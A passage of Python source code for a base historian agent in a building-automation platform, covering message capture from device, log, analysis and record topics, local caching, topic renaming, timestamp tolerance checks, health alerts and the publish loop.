return 0.0
# Assume 2 phases and proper format.
time1 = datetime.strptime(values[0][11:26], "%H:%M:%S.%f")
time2 = datetime.strptime(values[1][11:26], "%H:%M:%S.%f")
return abs((time1 - time2).total_seconds())
STATUS_KEY_BACKLOGGED = "backlogged"
STATUS_KEY_CACHE_COUNT = "cache_count"
STATUS_KEY_PUBLISHING = "publishing"
STATUS_KEY_CACHE_FULL = "cache_full"
STATUS_KEY_TIME_ERROR = "records_with_invalid_timestamp"
STATUS_KEY_CACHE_ONLY = "cache_only_enabled"
class BaseHistorianAgent(Agent):
"""
This is the base agent for historian Agents.
It automatically subscribes to all device publish topics.
Event processing occurs in its own thread as to not block the main
thread. Both the historian_setup and publish_to_historian happen in
the same thread.
By default the base historian will listen to four separate root topics
(datalogger/*, record/*, analysis/*, and device/*).
Messages published to datalogger are assumed to be time-point data composed
of units and specific types, with the expectation that they can be graphed
easily. Messages published to devices
are data that comes directly from drivers. Data sent to analysis/* topics
is result of analysis done by applications. The format of data sent to
analysis/* topics is similar to data sent to device/* topics.
Messages that are published to record will be handled as string data and
can be customized to the user's specific situation. Refer to
`Historian-Topic-Syntax
</core_services/historians/Historian-Topic-Syntax.html>`_ for the data syntax.
This base historian will cache all received messages to a local database
before publishing them to the historian. This allows recovery from
unexpected failures that occur before data is successfully written to the
historian.
"""
def __init__(self,
retry_period=300.0,
submit_size_limit=1000,
max_time_publishing=30.0,
backup_storage_limit_gb=None,
backup_storage_report=0.9,
topic_replace_list=[],
gather_timing_data=False,
readonly=False,
process_loop_in_greenlet=False,
capture_device_data=True,
capture_log_data=True,
capture_analysis_data=True,
capture_record_data=True,
message_publish_count=10000,
history_limit_days=None,
storage_limit_gb=None,
sync_timestamp=False,
custom_topics={},
device_data_filter={},
all_platforms=False,
time_tolerance=None,
time_tolerance_topics=None,
cache_only_enabled=False,
**kwargs):
super(BaseHistorianAgent, self).__init__(**kwargs)
# Each entry in topic_replace_list should be a dictionary with keys
# 'from' and 'to'; matching substrings are replaced within topics before
# they are stored in the cache database.
self._process_loop_in_greenlet = process_loop_in_greenlet
self._topic_replace_list = topic_replace_list
self._async_call = AsyncCall()
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self.gather_timing_data = bool(gather_timing_data)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._retry_period = float(retry_period)
self._submit_size_limit = int(submit_size_limit)
self._max_time_publishing = float(max_time_publishing)
self._history_limit_days = history_limit_days
self._storage_limit_gb = storage_limit_gb
self._successful_published = set()
# Remove the need to reset subscriptions to eliminate possible data
# loss at config change.
self._current_subscriptions = set()
self._topic_replace_map = {}
self._event_queue = gevent.queue.Queue() if self._process_loop_in_greenlet else Queue()
self._readonly = bool(readonly)
self._stop_process_loop = False
self._setup_failed = False
self._process_thread = None
self._message_publish_count = int(message_publish_count)
self.no_insert = False
self.no_query = False
self.instance_name = None
self._sync_timestamp = sync_timestamp
self._current_status_context = {
STATUS_KEY_CACHE_COUNT: 0,
STATUS_KEY_BACKLOGGED: False,
STATUS_KEY_PUBLISHING: True,
STATUS_KEY_CACHE_FULL: False,
STATUS_KEY_CACHE_ONLY: False
}
self._all_platforms = bool(all_platforms)
self._time_tolerance = float(time_tolerance) if time_tolerance else None
if self._time_tolerance is not None:
if time_tolerance_topics is None:
time_tolerance_topics = ["devices"]
elif not isinstance(time_tolerance_topics, list):
raise ValueError(f"time_tolerance_topic should a list of topics. Got value({time_tolerance_topics}) of "
f"type {type(time_tolerance_topics)}")
self._time_tolerance_topics = time_tolerance_topics
if str(cache_only_enabled) in ('True', 'False'):
self._cache_only_enabled = cache_only_enabled
self._current_status_context[STATUS_KEY_CACHE_ONLY] = cache_only_enabled
else:
raise ValueError(f"cache_only_enabled should be either True or False")
self._default_config = {
"retry_period":self._retry_period,
"submit_size_limit": self._submit_size_limit,
"max_time_publishing": self._max_time_publishing,
"backup_storage_limit_gb": self._backup_storage_limit_gb,
"backup_storage_report": self._backup_storage_report,
"topic_replace_list": self._topic_replace_list,
"gather_timing_data": self.gather_timing_data,
"readonly": self._readonly,
"capture_device_data": capture_device_data,
"capture_log_data": capture_log_data,
"capture_analysis_data": capture_analysis_data,
"capture_record_data": capture_record_data,
"message_publish_count": self._message_publish_count,
"storage_limit_gb": storage_limit_gb,
"history_limit_days": history_limit_days,
"custom_topics": custom_topics,
"device_data_filter": device_data_filter,
"all_platforms": self._all_platforms,
"time_tolerance": self._time_tolerance,
"time_tolerance_topics": self._time_tolerance_topics,
"cache_only_enabled": self._cache_only_enabled
}
self.vip.config.set_default("config", self._default_config)
self.vip.config.subscribe(self._configure, actions=["NEW", "UPDATE"], pattern="config")
def update_default_config(self, config):
"""
May be called by concrete historians to add to the default configuration for
their own use.
"""
self._default_config.update(config)
self.vip.config.set_default("config", self._default_config)
def start_process_thread(self):
if self._process_loop_in_greenlet:
self._process_thread = self.core.spawn(self._process_loop)
self._process_thread.start()
_log.debug("Process greenlet started.")
else:
self._process_thread = Thread(target=self._process_loop)
self._process_thread.daemon = True # Don't wait on thread to exit.
self._process_thread.start()
_log.debug("Process thread started.")
def manage_db_size(self, history_limit_timestamp, storage_limit_gb):
"""
Called in the process thread after data is published.
This can be overridden in historian implementations
to apply the storage_limit_gb and history_limit_days
settings to the storage medium.
:param history_limit_timestamp: remove all data older than this timestamp
:param storage_limit_gb: remove oldest data until database is smaller than this value.
"""
pass
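# Illustrative only (not part of the original agent): a SQL-backed subclass
# might apply the history limit roughly like this, where ``self._execute`` is
# a hypothetical helper around the store's cursor:
#
#     def manage_db_size(self, history_limit_timestamp, storage_limit_gb):
#         if history_limit_timestamp is not None:
#             self._execute("DELETE FROM data WHERE ts < %s",
#                           (history_limit_timestamp,))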
def stop_process_thread(self):
_log.debug("Stopping the process loop.")
if self._process_thread is None:
return
# Tell the loop it needs to die.
self._stop_process_loop = True
# Wake the loop.
self._event_queue.put(None)
# 9 seconds as configuration timeout is 10 seconds.
self._process_thread.join(9.0)
# Greenlets have slightly different API than threads in this case.
if self._process_loop_in_greenlet:
if not self._process_thread.ready():
_log.error("Failed to stop process greenlet during reconfiguration!")
elif self._process_thread.is_alive():
_log.error("Failed to stop process thread during reconfiguration!")
self._process_thread = None
_log.debug("Process loop stopped.")
def _configure(self, config_name, action, contents):
self.vip.heartbeat.start()
config = self._default_config.copy()
config.update(contents)
try:
topic_replace_list = list(config.get("topic_replace_list", []))
gather_timing_data = bool(config.get("gather_timing_data", False))
backup_storage_limit_gb = config.get("backup_storage_limit_gb")
if backup_storage_limit_gb is not None:
backup_storage_limit_gb = float(backup_storage_limit_gb)
backup_storage_report = config.get("backup_storage_report", 0.9)
if backup_storage_report:
backup_storage_report = float(backup_storage_report)
backup_storage_report = min(1.0, backup_storage_report)
backup_storage_report = max(0.0001, backup_storage_report)
else:
backup_storage_report = 0.9
retry_period = float(config.get("retry_period", 300.0))
storage_limit_gb = config.get("storage_limit_gb")
if storage_limit_gb:
storage_limit_gb = float(storage_limit_gb)
history_limit_days = config.get("history_limit_days")
if history_limit_days:
history_limit_days = float(history_limit_days)
submit_size_limit = int(config.get("submit_size_limit", 1000))
max_time_publishing = float(config.get("max_time_publishing", 30.0))
readonly = bool(config.get("readonly", False))
message_publish_count = int(config.get("message_publish_count", 10000))
all_platforms = bool(config.get("all_platforms", False))
time_tolerance = config.get("time_tolerance")
time_tolerance_topics = config.get("time_tolerance_topics")
time_tolerance = float(time_tolerance) if time_tolerance else None
if time_tolerance is not None:
if time_tolerance_topics is None:
time_tolerance_topics = ["devices"]
elif not isinstance(time_tolerance_topics, list):
raise ValueError(
f"time_tolerance_topic should a list of topics. Got value({time_tolerance_topics}) of "
f"type {type(time_tolerance_topics)}")
cache_only_enabled = config.get("cache_only_enabled", False)
if str(cache_only_enabled) not in ('True', 'False'):
raise ValueError(f"cache_only_enabled should be either True or False")
self._cache_only_enabled = cache_only_enabled
self._current_status_context[STATUS_KEY_CACHE_ONLY] = cache_only_enabled
self._time_tolerance_topics = time_tolerance_topics
except ValueError as e:
self._backup_storage_report = 0.9
_log.exception("Failed to load base historian settings. Settings not applied!")
return
query = Query(self.core)
self.instance_name = query.query('instance-name').get()
# Reset replace map.
self._topic_replace_map = {}
self._topic_replace_list = topic_replace_list
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self.gather_timing_data = gather_timing_data
self._backup_storage_limit_gb = backup_storage_limit_gb
self._backup_storage_report = backup_storage_report
self._retry_period = retry_period
self._submit_size_limit = submit_size_limit
self._max_time_publishing = timedelta(seconds=max_time_publishing)
self._history_limit_days = timedelta(days=history_limit_days) if history_limit_days else None
self._storage_limit_gb = storage_limit_gb
self._all_platforms = all_platforms
self._readonly = readonly
self._message_publish_count = message_publish_count
self._time_tolerance = time_tolerance
self._time_tolerance_topics = time_tolerance_topics
custom_topics_list = []
for handler, topic_list in config.get("custom_topics", {}).items():
if handler == "capture_device_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_device_data))
elif handler == "capture_log_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_log_data))
elif handler == "capture_analysis_data":
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_analysis_data))
else:
for topic in topic_list:
custom_topics_list.append((True, topic, self._capture_record_data))
self._update_subscriptions(bool(config.get("capture_device_data", True)),
bool(config.get("capture_log_data", True)),
bool(config.get("capture_analysis_data", True)),
bool(config.get("capture_record_data", True)),
custom_topics_list)
self.stop_process_thread()
self._device_data_filter = config.get("device_data_filter")
try:
self.configure(config)
except Exception as e:
_log.error("Failed to load historian settings.{}".format(e))
self.start_process_thread()
def _update_subscriptions(self, capture_device_data,
capture_log_data,
capture_analysis_data,
capture_record_data,
custom_topics_list):
subscriptions = [
(capture_device_data, topics.DRIVER_TOPIC_BASE, self._capture_device_data),
(capture_log_data, topics.LOGGER_BASE, self._capture_log_data),
(capture_analysis_data, topics.ANALYSIS_TOPIC_BASE, self._capture_analysis_data),
(capture_record_data, topics.RECORD_BASE, self._capture_record_data)
]
subscriptions.extend(custom_topics_list)
for should_sub, prefix, cb in subscriptions:
if should_sub and not self._readonly:
if prefix not in self._current_subscriptions:
_log.debug("subscribing to {}".format(prefix))
try:
self.vip.pubsub.subscribe(peer='pubsub',
prefix=prefix,
callback=cb,
all_platforms=self._all_platforms).get(timeout=5.0)
self._current_subscriptions.add(prefix)
except (gevent.Timeout, Exception) as e:
_log.error("Failed to subscribe to {}: {}".format(prefix, repr(e)))
else:
if prefix in self._current_subscriptions:
_log.debug("unsubscribing from {}".format(prefix))
try:
self.vip.pubsub.unsubscribe(peer='pubsub',
prefix=prefix,
callback=cb).get(timeout=5.0)
self._current_subscriptions.remove(prefix)
except (gevent.Timeout, Exception) as e:
_log.error("Failed to unsubscribe from {}: {}".format(prefix, repr(e)))
def configure(self, configuration):
"""Optional, may be implemented by a concrete implementation to add support for the configuration store.
Values should be stored in this function only.
The process thread is stopped before this is called if it is running. It is started afterwards.
`historian_setup` is called after this is called. """
pass
@RPC.export
def insert(self, records):
"""RPC method to allow remote inserts to the local cache
:param records: List of items to be added to the local event queue
:type records: list of dictionaries
"""
# This is for Forward Historians which do not support data mover inserts.
if self.no_insert:
raise RuntimeError("Insert not supported by this historian.")
rpc_peer = self.vip.rpc.context.vip_message.peer
_log.debug("insert called by {} with {} records".format(rpc_peer, len(records)))
for r in records:
topic = r['topic']
headers = r['headers']
message = r['message']
capture_func = None
if topic.startswith(topics.DRIVER_TOPIC_BASE):
capture_func = self._capture_device_data
elif topic.startswith(topics.LOGGER_BASE):
capture_func = self._capture_log_data
elif topic.startswith(topics.ANALYSIS_TOPIC_BASE):
capture_func = self._capture_analysis_data
elif topic.startswith(topics.RECORD_BASE):
capture_func = self._capture_record_data
if capture_func:
capture_func(peer=None, sender=None, bus=None,
topic=topic, headers=headers, message=message)
else:
_log.error("Unrecognized topic in insert call: {}".format(topic))
@Core.receiver("onstop")
def stopping(self, sender, **kwargs):
"""
Release subscription to the message bus because we are no longer able
to respond to messages now.
"""
if not self._readonly:
try:
# stop the process loop thread/greenlet before exiting
self.stop_process_thread()
# unsubscribes to all topics that we are subscribed to.
self.vip.pubsub.unsubscribe(peer='pubsub', prefix=None,
callback=None)
except KeyError:
# means that the agent didn't start up properly so the pubsub
# subscriptions never got finished.
pass
def parse_table_def(self, tables_def):
default_table_def = {"table_prefix": "",
"data_table": "data",
"topics_table": "topics",
"meta_table": "meta"}
if not tables_def:
tables_def = default_table_def
else:
default_table_def.update(tables_def)
tables_def = default_table_def
table_names = dict(tables_def)
table_prefix = tables_def.get('table_prefix', None)
table_prefix = table_prefix + "_" if table_prefix else ""
if table_prefix:
for key, value in list(table_names.items()):
table_names[key] = table_prefix + table_names[key]
table_names["agg_topics_table"] = table_prefix + \
"aggregate_" + tables_def["topics_table"]
table_names["agg_meta_table"] = table_prefix + \
"aggregate_" + tables_def["meta_table"]
return tables_def, table_names
def get_renamed_topic(self, input_topic):
"""
        Replace the topic name based on the configured topic replace list, if any.
        :param input_topic: original topic name
        :return: topic name after applying any configured replacements
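        A minimal illustration, assuming a hypothetical replace list entry
        (the names below are made up for the example):

        .. code-block:: python

            # configured in the agent config:
            #   "topic_replace_list": [{"from": "FCU", "to": "fcu"}]
            renamed = self.get_renamed_topic("devices/PNNL/BUILDING1/FCU1/all")
            # -> "devices/PNNL/BUILDING1/fcu1/all"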
"""
output_topic = input_topic
input_topic_lower = input_topic.lower()
# Only if we have some topics to replace.
if self._topic_replace_list:
# if we have already cached the topic then return it.
if input_topic_lower in self._topic_replace_map:
output_topic = self._topic_replace_map[input_topic_lower]
else:
self._topic_replace_map[input_topic_lower] = input_topic
temptopics = {}
for x in self._topic_replace_list:
if x['from'].lower() in input_topic_lower:
                        # this allows multiple things to be replaced
                        # from a given topic.
new_topic = temptopics.get(input_topic_lower,
input_topic)
# temptopics[input_topic] = new_topic.replace(
# x['from'], x['to'])
temptopics[input_topic_lower] = re.compile(
re.escape(x['from']), re.IGNORECASE).sub(x['to'],
new_topic)
for k, v in temptopics.items():
self._topic_replace_map[k] = v
output_topic = self._topic_replace_map[input_topic_lower]
_log.debug("Output topic after replacements {}".format(output_topic))
return output_topic
def does_time_exceed_tolerance(self, topic, utc_timestamp):
if self._time_tolerance:
# If time tolerance is set, and it needs to be checked for this topic
# compare the incoming timestamp with the current time.
if topic.startswith(tuple(self._time_tolerance_topics)):
                # use total_seconds() so that differences of a day or more are not ignored
                return abs(get_aware_utc_now() - utc_timestamp).total_seconds() > self._time_tolerance
return False
def is_cache_only_enabled(self):
return self._cache_only_enabled
def _capture_record_data(self, peer, sender, bus, topic, headers,
message):
# _log.debug('Capture record data {}'.format(topic))
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, timestamp)
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
self._event_queue.put(
{'source': 'record',
'topic': topic,
'readings': [(timestamp, message)],
'meta': {},
'headers': headers})
def _capture_log_data(self, peer, sender, bus, topic, headers, message):
"""Capture log data and submit it to be published by a historian."""
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
try:
            # 2.0 agents compatibility layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
data = compat.unpack_legacy_message(headers, message)
else:
data = message
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
for point, item in data.items():
if 'Readings' not in item or 'Units' not in item:
_log.error("logging request for {topic} missing Readings "
"or Units".format(topic=topic))
continue
units = item['Units']
dtype = item.get('data_type', 'float')
tz = item.get('tz', None)
if dtype == 'double':
dtype = 'float'
meta = {'units': units, 'type': dtype}
readings = item['Readings']
if not isinstance(readings, list):
readings = [(get_aware_utc_now(), readings)]
elif isinstance(readings[0], str):
my_ts, my_tz = process_timestamp(readings[0], topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, my_ts)
readings = [(my_ts, readings[1])]
if tz:
meta['tz'] = tz
elif my_tz:
meta['tz'] = my_tz.zone
self._event_queue.put({'source': 'log',
'topic': topic + '/' + point,
'readings': readings,
'meta': meta,
'headers': headers})
def _capture_device_data(self, peer, sender, bus, topic, headers,
message):
"""Capture device data and submit it to be published by a historian.
Filter out only the */all topics for publishing to the historian.
"""
if not ALL_REX.match(topic):
return
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
# Because of the above if we know that all is in the topic so
# we strip it off to get the base device
parts = topic.split('/')
device = '/'.join(parts[1:-1])
# msg = [{data},{meta}] format
msg = [{}, {}]
try:
# If the filter is empty pass all data.
if self._device_data_filter:
for _filter, point_list in self._device_data_filter.items():
# If filter is not empty only topics that contain the key
# will be kept.
if _filter in device:
for point in point_list:
# devices all publish
if isinstance(message, list):
# Only points in the point list will be added to the message payload
if point in message[0]:
msg[0][point] = message[0][point]
msg[1][point] = message[1][point]
else:
# other devices publish (devices/campus/building/device/point)
msg = None
if point in device:
msg = message
                                    # if the point is in the parsed topic then exit the for loop
break
                # nothing matched the filter: either an empty data payload or msg was never set
                if (isinstance(msg, list) and not msg[0]) or msg is None:
                    _log.debug("Topic: {} - is not configured to be stored".format(topic))
return
else:
msg = message
except Exception as e:
_log.debug("Error handling device_data_filter. {}".format(e))
msg = message
self._capture_data(peer, sender, bus, topic, headers, msg, device)
def _capture_analysis_data(self, peer, sender, bus, topic, headers,
message):
"""Capture analaysis data and submit it to be published by a historian.
Filter out all but the all topics
"""
# Anon the topic.
topic = self.get_renamed_topic(topic)
if topic.endswith('/'):
topic = topic[:-1]
if not topic.endswith('all'):
topic += '/all'
parts = topic.split('/')
# strip off the first part of the topic.
device = '/'.join(parts[1:-1])
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_data(self, peer, sender, bus, topic, headers, message,
device):
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get(headers_mod.SYNC_TIMESTAMP if self._sync_timestamp else headers_mod.TIMESTAMP,
headers.get(headers_mod.DATE))
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
headers['time_error'] = self.does_time_exceed_tolerance(topic, timestamp)
try:
            # 2.0 agents compatibility layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
if isinstance(message, dict):
values = message
else:
values = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
except Exception as e:
_log.exception(e)
return
meta = {}
if not isinstance(message, dict):
if len(message) == 2:
meta = message[1]
if topic.startswith('analysis'):
source = 'analysis'
else:
source = 'scrape'
# _log.debug(
# "Queuing {topic} from {source} for publish".format(topic=topic,
# source=source))
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
for key, value in values.items():
point_topic = device + '/' + key
self._event_queue.put({'source': source,
'topic': point_topic,
'readings': [(timestamp, value)],
'meta': meta.get(key, {}),
'headers': headers})
def _capture_actuator_data(self, topic, headers, message, match):
"""Capture actuation data and submit it to be published by a historian.
"""
# Anon the topic if necessary.
topic = self.get_renamed_topic(topic)
timestamp_string = headers.get('time')
if timestamp_string is None:
_log.error(
"message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse(timestamp_string)
except (ValueError, TypeError) as e:
_log.error("message for {} bad timetamp string: "
"{}".format(topic, timestamp_string))
return
parts = topic.split('/')
topic = '/'.join(parts[ACTUATOR_TOPIC_PREFIX_PARTS:])
try:
value = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'actuator'
# _log.debug(
# "Queuing {topic} from {source} for publish".format(topic=topic,
# source=source))
if self.gather_timing_data:
add_timing_data_to_header(headers, self.core.agent_uuid or self.core.identity, "collected")
self._event_queue.put({'source': source,
'topic': topic,
                               'readings': [(timestamp, value)],
'meta': {},
'headers': headers})
@staticmethod
def _get_status_from_context(context):
status = STATUS_GOOD
if (context.get(STATUS_KEY_BACKLOGGED) or
context.get(STATUS_KEY_CACHE_FULL) or
not context.get(STATUS_KEY_PUBLISHING) or
context.get(STATUS_KEY_TIME_ERROR)):
status = STATUS_BAD
return status
def _update_status_callback(self, status, context):
self.vip.health.set_status(status, context)
def _update_status(self, updates):
context_copy, new_status = self._update_and_get_context_status(updates)
self._async_call.send(None, self._update_status_callback, new_status, context_copy)
def _send_alert_callback(self, status, context, key):
self.vip.health.set_status(status, context)
alert_status = Status()
alert_status.update_status(status, context)
self.vip.health.send_alert(key, alert_status)
def _update_and_get_context_status(self, updates):
self._current_status_context.update(updates)
context_copy = self._current_status_context.copy()
new_status = self._get_status_from_context(context_copy)
return context_copy, new_status
def _send_alert(self, updates, key):
context_copy, new_status = self._update_and_get_context_status(updates)
self._async_call.send(None, self._send_alert_callback, new_status, context_copy, key)
def _process_loop(self):
"""
The process loop is called off of the main thread and will not exit
unless the main agent is shutdown or the Agent is reconfigured.
"""
try:
self._do_process_loop()
except:
self._send_alert({STATUS_KEY_PUBLISHING: False}, "process_loop_failed")
raise
def _do_process_loop(self):
_log.debug("Starting process loop.")
current_published_count = 0
next_report_count = current_published_count + self._message_publish_count
        # Set up the concrete historian. This is called even in readonly mode,
        # in case the historian sets up connections that are shared by query
        # and write operations, or needs to load the topic id/name map.
        self._historian_setup()
if self._readonly:
_log.info("Historian setup in readonly mode.")
return
backupdb = BackupDatabase(self, self._backup_storage_limit_gb,
self._backup_storage_report)
self._update_status({STATUS_KEY_CACHE_COUNT: backupdb.get_backlog_count()})
# now that everything is setup we need to make sure that the topics
# are synchronized between
# Based on the state of the back log and whether or not successful
# publishing is currently happening (and how long it's taking)
# we may or may not want to wait on the event queue for more input
# before proceeding with the rest of the loop.
wait_for_input = not bool(backupdb.get_outstanding_to_publish(1))
while True:
if not wait_for_input:
self._update_status({STATUS_KEY_BACKLOGGED: True})
try:
# _log.debug("Reading from/waiting for queue.")
new_to_publish = [
self._event_queue.get(wait_for_input, self._retry_period)]
except Empty:
_log.debug("Queue wait timed out. Falling out.")
new_to_publish = []
if new_to_publish:
# _log.debug("Checking for queue build up.")
while True:
try:
new_to_publish.append(self._event_queue.get_nowait())
except Empty:
break
# We wake the thread after a configuration change by passing a None to the queue.
# Backup anything new before checking for a stop.
cache_full = backupdb.backup_new_data(new_to_publish, bool(self._time_tolerance))
backlog_count = backupdb.get_backlog_count()
if cache_full:
self._send_alert({STATUS_KEY_CACHE_FULL: cache_full,
STATUS_KEY_BACKLOGGED: True,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_TIME_ERROR: backupdb.time_error_records},
"historian_cache_full")
else:
old_backlog_state = self._current_status_context[STATUS_KEY_BACKLOGGED]
state = {
STATUS_KEY_CACHE_FULL: cache_full,
STATUS_KEY_BACKLOGGED: old_backlog_state and backlog_count > 0,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_TIME_ERROR: backupdb.time_error_records}
self._update_status(state)
if backupdb.time_error_records:
self._send_alert(
state,
"Historian received records with invalid timestamp. Please check records in time_error table.")
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
if self._setup_failed:
# if setup failed earlier, try again.
self._historian_setup()
# if setup was successful proceed to publish loop
if not self._setup_failed:
wait_for_input = True
start_time = datetime.utcnow()
while True:
# use local variable that will be written only one time during this loop
cache_only_enabled = self.is_cache_only_enabled()
to_publish_list = backupdb.get_outstanding_to_publish(
self._submit_size_limit)
# Check to see if we are caught up.
if not to_publish_list:
if self._message_publish_count > 0 and next_report_count < current_published_count:
_log.info("Historian processed {} total records.".format(current_published_count))
next_report_count = current_published_count + self._message_publish_count
self._update_status({STATUS_KEY_BACKLOGGED: False,
STATUS_KEY_CACHE_COUNT: backupdb.get_backlog_count()})
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
history_limit_timestamp = None
if self._history_limit_days is not None:
last_element = to_publish_list[-1]
last_time_stamp = last_element["timestamp"]
history_limit_timestamp = last_time_stamp - self._history_limit_days
try:
if not cache_only_enabled:
self.publish_to_historian(to_publish_list)
self.manage_db_size(history_limit_timestamp, self._storage_limit_gb)
except:
_log.exception(
"An unhandled exception occurred while publishing.")
# if the success queue is empty then we need not remove
# them from the database and we are probably having connection problems.
# Update the status and send alert accordingly.
if not self._successful_published and not cache_only_enabled:
self._send_alert({STATUS_KEY_PUBLISHING: False}, "historian_not_publishing")
break
                    # _successful_published is populated when publish_to_historian is called on
                    # the concrete historian. Because that function is not called when
                    # cache_only_enabled is True, _successful_published stays an empty set(), so
                    # this call does not need to be wrapped in a cache_only_enabled check.
backupdb.remove_successfully_published(
self._successful_published, self._submit_size_limit)
backlog_count = backupdb.get_backlog_count()
old_backlog_state = self._current_status_context[STATUS_KEY_BACKLOGGED]
self._update_status({STATUS_KEY_PUBLISHING: True,
STATUS_KEY_BACKLOGGED: old_backlog_state and backlog_count > 0,
STATUS_KEY_CACHE_COUNT: backlog_count,
STATUS_KEY_CACHE_ONLY: cache_only_enabled})
if None in self._successful_published:
current_published_count += len(to_publish_list)
else:
current_published_count += len(self._successful_published)
if self._message_publish_count > 0:
if current_published_count >= next_report_count:
_log.info("Historian processed {} total records.".format(current_published_count))
next_report_count = current_published_count + self._message_publish_count
self._successful_published = set()
now = datetime.utcnow()
if now - start_time > self._max_time_publishing:
wait_for_input = False
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
# Check for a stop for reconfiguration.
if self._stop_process_loop:
break
backupdb.close()
try:
self.historian_teardown()
except Exception:
_log.exception("Historian teardown failed!")
_log.debug("Process loop stopped.")
self._stop_process_loop = False
def _historian_setup(self):
try:
_log.info("Trying to setup historian")
self.historian_setup()
if self._setup_failed:
self._setup_failed = False
self._update_status({STATUS_KEY_PUBLISHING: True})
except:
_log.exception("Failed to setup historian!")
self._setup_failed = True
self._send_alert({STATUS_KEY_PUBLISHING: False},
"historian_not_publishing")
def report_handled(self, record):
"""
        Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to
        report that a record or list of records has been successfully
        published and should be removed from the cache.
:param record: Record or list of records to remove from cache.
:type record: dict or list
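        A minimal usage sketch inside a concrete ``publish_to_historian``
        (``store_one`` is a hypothetical helper, not part of this class):

        .. code-block:: python

            for record in to_publish_list:
                if store_one(record):
                    self.report_handled(record)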
"""
if isinstance(record, list):
for x in record:
self._successful_published.add(x['_id'])
else:
self._successful_published.add(record['_id'])
def report_all_handled(self):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian`
to report that all records passed to
:py:meth:`BaseHistorianAgent.publish_to_historian`
have been successfully published and should be removed from the cache.
"""
self._successful_published.add(None)
@abstractmethod
def publish_to_historian(self, to_publish_list):
"""
Main publishing method for historian Agents.
:param to_publish_list: List of records
:type to_publish_list: list
to_publish_list takes the following form:
.. code-block:: python
[
{
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
        The contents of `meta` are not guaranteed to be consistent: the keys in
        the metadata and their values may change over time. It is safe to
        assume that the most recent values of the "meta" dictionary are the
        only ones that are relevant. This is the way the cache treats metadata.
Once one or more records are published either
:py:meth:`BaseHistorianAgent.report_all_handled` or
:py:meth:`BaseHistorianAgent.report_handled` must be called to
report records as being published.
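        A minimal sketch of a concrete implementation (``my_backend`` is a
        hypothetical storage client, not part of this class):

        .. code-block:: python

            def publish_to_historian(self, to_publish_list):
                for record in to_publish_list:
                    try:
                        my_backend.store(record['topic'],
                                         record['timestamp'],
                                         record['value'],
                                         record['meta'])
                    except Exception:
                        # unreported records stay in the cache and are retried
                        break
                    self.report_handled(record)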
"""
def historian_setup(self):
"""
Optional setup routine, run in the processing thread before
main processing loop starts. Gives the Historian a chance to setup
connections in the publishing thread.
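        A minimal sketch of an override (``sqlite3``, the file name and the
        attribute name are purely illustrative choices):

        .. code-block:: python

            def historian_setup(self):
                import sqlite3
                # runs in the processing thread, which then owns the connection
                self._db_connection = sqlite3.connect("my_store.sqlite")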
"""
def historian_teardown(self):
"""
Optional teardown routine, run in the processing thread if the main
        processing loop is stopped. This happens whenever a new configuration
arrives from the config store.
"""
#TODO: Finish this.
# from collections import deque
#
# class MemoryDatabase:
# def __init__(self, owner, backup_storage_limit_gb):
# # The topic cache is only meant as a local lookup and should not be
# # accessed via the implemented historians.
# self._backup_cache = {}
# self._meta_data = defaultdict(dict)
# self._owner = weakref.ref(owner)
# self._backup_storage_limit_gb = backup_storage_limit_gb
# self._deque = deque()
#
# def get_outstanding_to_publish(self, size_limit):
# _log.debug("Getting oldest outstanding to publish.")
# results = []
#
# count = 0
# for row in self._deque:
# timestamp = row[0]
# source = row[1]
# topic = row[2]
# value = row[3]
# headers = {} if row[4] is None else row[4]
